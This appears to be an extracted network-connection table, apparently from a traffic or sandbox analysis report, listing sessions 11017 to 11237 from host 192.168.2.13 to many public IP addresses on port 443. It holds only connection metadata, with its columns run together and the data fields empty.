                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11017192.168.2.1342106139.191.155.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11018192.168.2.1338396148.178.109.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11019192.168.2.1353080123.101.152.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11020192.168.2.1350964140.37.219.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11021192.168.2.135804273.29.152.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11022192.168.2.135750674.82.192.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11023192.168.2.1339168140.31.95.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11024192.168.2.1359602114.254.18.159443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11025192.168.2.1357788186.211.134.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11026192.168.2.1340456160.148.208.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11027192.168.2.134825680.213.108.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11028192.168.2.133818291.147.80.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11029192.168.2.1350422133.213.199.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11030192.168.2.1348768123.159.187.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11031192.168.2.1355486120.137.202.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11032192.168.2.1358880162.212.86.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11033192.168.2.13581562.233.64.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11034192.168.2.135513849.163.147.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11035192.168.2.1350152160.221.90.87443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11036192.168.2.1337194115.214.191.156443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11037192.168.2.1345100107.133.147.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11038192.168.2.134503019.160.233.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11039192.168.2.1334112143.186.140.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11040192.168.2.134794891.8.48.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11041192.168.2.13556405.137.120.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11042192.168.2.135330847.77.203.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11043192.168.2.1342294117.243.240.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11044192.168.2.1350332189.164.78.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11045192.168.2.134146025.213.106.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11046192.168.2.1357996208.102.62.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11047192.168.2.1345832116.130.58.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11048192.168.2.1341990121.157.151.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11049192.168.2.1352918149.214.162.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11050192.168.2.1334286158.83.138.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11051192.168.2.133367445.116.51.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11052192.168.2.1338590202.122.82.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11053192.168.2.1344360120.122.84.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11054192.168.2.1345732130.121.147.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11055192.168.2.1336284149.201.132.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11056192.168.2.1348094114.37.5.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11057192.168.2.135920092.249.115.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11058192.168.2.133743240.237.138.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11059192.168.2.135006492.117.254.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11060192.168.2.133319034.214.190.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11061192.168.2.135464266.66.221.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11062192.168.2.13419168.7.37.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11063192.168.2.1344000124.116.84.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11064192.168.2.1342012173.231.244.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11065192.168.2.1338994101.119.95.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11066192.168.2.1334682117.118.63.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11067192.168.2.1357280104.34.233.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11068192.168.2.134628662.65.19.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11069192.168.2.133891248.34.44.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11070192.168.2.1336348191.171.236.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11071192.168.2.135120483.253.220.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11072192.168.2.1336142110.167.57.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11073192.168.2.133858299.157.255.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11074192.168.2.13504062.200.221.204443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11075192.168.2.134266813.178.209.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11076192.168.2.13506621.146.125.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11077192.168.2.1347644168.57.12.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11078192.168.2.1352886137.20.162.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11079192.168.2.1333340158.207.63.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11080192.168.2.135423413.163.90.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11081192.168.2.1354532175.21.133.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11082192.168.2.1334816138.64.136.158443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11083192.168.2.1333634111.109.206.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11084192.168.2.135033864.22.196.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11085192.168.2.1345696148.12.74.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11086192.168.2.134606283.147.108.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11087192.168.2.134858254.69.11.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11088192.168.2.13356661.240.207.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11089192.168.2.1348148161.43.100.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11090192.168.2.1357150210.198.154.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11091192.168.2.133947896.48.142.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11092192.168.2.1360566112.36.123.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11093192.168.2.134627288.36.128.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11094192.168.2.134475677.208.232.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11095192.168.2.135733085.202.61.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11096192.168.2.134842045.253.61.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11097192.168.2.1355716176.28.3.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11098192.168.2.1346570211.84.176.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11099192.168.2.1358430180.216.198.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11100192.168.2.135034623.4.133.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11101192.168.2.136073699.116.91.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11102192.168.2.1342484168.14.11.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11103192.168.2.1337580162.42.138.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11104192.168.2.135193284.96.53.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11105192.168.2.1344774179.238.168.113443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11106192.168.2.134130813.209.132.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11107192.168.2.135691292.84.46.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11108192.168.2.135327814.10.52.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11109192.168.2.1338300141.65.186.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11110192.168.2.136083639.238.153.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11111192.168.2.1341882140.219.125.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11112192.168.2.1351360179.8.206.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11113192.168.2.1347546131.219.33.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11114192.168.2.1335480174.92.21.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11115192.168.2.1351776165.39.211.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11116192.168.2.133463292.17.4.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11117192.168.2.1345262163.164.216.43443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11118192.168.2.1356764103.217.219.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11119192.168.2.133609823.15.4.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11120192.168.2.1345744190.177.23.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11121192.168.2.1355020171.33.107.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11122192.168.2.134139045.168.252.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11123192.168.2.1346838103.13.215.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11124192.168.2.134058072.6.129.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11125192.168.2.1352528163.32.119.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11126192.168.2.133966053.188.55.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11127192.168.2.1335254209.71.204.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11128192.168.2.135984427.232.210.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11129192.168.2.1349410202.254.250.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11130192.168.2.1336740212.9.220.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11131192.168.2.1344610188.0.98.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11132192.168.2.1351524118.212.107.43443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11133192.168.2.13368988.218.244.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11134192.168.2.136046485.109.0.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11135192.168.2.1345678210.124.187.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11136192.168.2.1345920173.201.80.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11137192.168.2.1344478168.138.78.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11138192.168.2.135331223.144.118.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11139192.168.2.1342342202.147.79.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11140192.168.2.1337120151.210.219.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11141192.168.2.1333632110.103.149.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11142192.168.2.134267613.234.189.87443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11143192.168.2.135628085.92.108.158443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11144192.168.2.1359794189.239.149.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11145192.168.2.134307051.214.137.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11146192.168.2.1354880209.13.178.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11147192.168.2.134785079.46.111.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11148192.168.2.134982845.197.6.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11149192.168.2.135276890.97.249.75443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11150192.168.2.134064236.205.73.113443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11151192.168.2.1337632103.25.248.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11152192.168.2.1338252187.92.200.128443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11153192.168.2.1334842106.203.247.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11154192.168.2.133569438.22.137.117443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11155192.168.2.1339326134.82.105.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11156192.168.2.135722039.116.199.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11157192.168.2.136053062.147.67.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11158192.168.2.1355178139.79.216.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11159192.168.2.1344956104.184.168.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11160192.168.2.1335198206.67.8.212443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11161192.168.2.1343630191.53.133.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11162192.168.2.133592083.235.97.75443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11163192.168.2.1347248141.27.121.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11164192.168.2.133985287.56.101.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11165192.168.2.1341796198.105.80.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11166192.168.2.133336497.45.244.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11167192.168.2.134152017.18.34.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11168192.168.2.135463232.44.208.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11169192.168.2.134572831.75.242.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11170192.168.2.133440269.158.155.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11171192.168.2.1354908194.122.69.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11172192.168.2.1354526204.37.161.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11173192.168.2.1353848157.194.144.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11174192.168.2.1355230223.175.44.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11175192.168.2.1353308200.153.159.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11176192.168.2.1355010185.164.93.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11177192.168.2.134073679.90.19.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11178192.168.2.133375845.114.39.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11179192.168.2.135666432.98.217.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11180192.168.2.1340168101.39.207.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11181192.168.2.1340410177.142.244.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11182192.168.2.1335906119.23.77.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11183192.168.2.134577876.82.235.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11184192.168.2.1344982184.137.165.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11185192.168.2.1334334142.36.89.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11186192.168.2.1356782181.147.30.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11187192.168.2.134069044.148.232.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11188192.168.2.1340430189.79.97.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11189192.168.2.1360748202.126.93.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11190192.168.2.134933414.150.186.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11191192.168.2.133496438.25.193.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11192192.168.2.1353882203.160.24.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11193192.168.2.1348980133.124.143.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11194192.168.2.135872441.44.181.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11195192.168.2.135826271.77.16.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11196192.168.2.1350348172.111.90.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11197192.168.2.1357056189.107.253.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11198192.168.2.1342600130.254.185.140443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11199192.168.2.1354030152.25.16.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11200192.168.2.1337508168.101.208.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11201192.168.2.133947213.17.42.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11202192.168.2.1349580204.208.139.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11203192.168.2.1342818160.105.49.140443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11204192.168.2.133496470.41.9.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11205192.168.2.1360300220.132.2.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11206192.168.2.135625292.107.170.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11207192.168.2.135114865.219.123.159443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11208192.168.2.1356476187.130.70.156443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11209192.168.2.1345100217.89.108.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11210192.168.2.1358904204.202.113.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11211192.168.2.134908489.51.42.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11212192.168.2.1333440118.22.43.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11213192.168.2.1343352112.125.102.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11214192.168.2.134915089.185.190.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11215192.168.2.1344824163.119.15.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11216192.168.2.135341691.53.169.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11217192.168.2.1354586125.210.190.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11218192.168.2.1343090200.113.185.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11219192.168.2.133948237.171.15.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11220192.168.2.133286023.133.105.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11221192.168.2.1350152116.11.28.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11222192.168.2.1338862153.48.63.127443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11223192.168.2.1339998159.79.0.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11224192.168.2.1356450153.247.122.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11225192.168.2.1342280220.38.139.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11226192.168.2.134062059.72.183.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11227192.168.2.1343998152.27.196.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11228192.168.2.1351878178.110.94.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11229192.168.2.1358588195.92.9.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11230192.168.2.1338422115.110.200.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11231192.168.2.135989487.145.211.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11232192.168.2.1333198151.76.92.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11233192.168.2.134239871.255.112.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11234192.168.2.133584885.37.242.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11235192.168.2.1338082109.34.103.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11236192.168.2.134380214.156.1.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11237192.168.2.1354536213.16.151.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
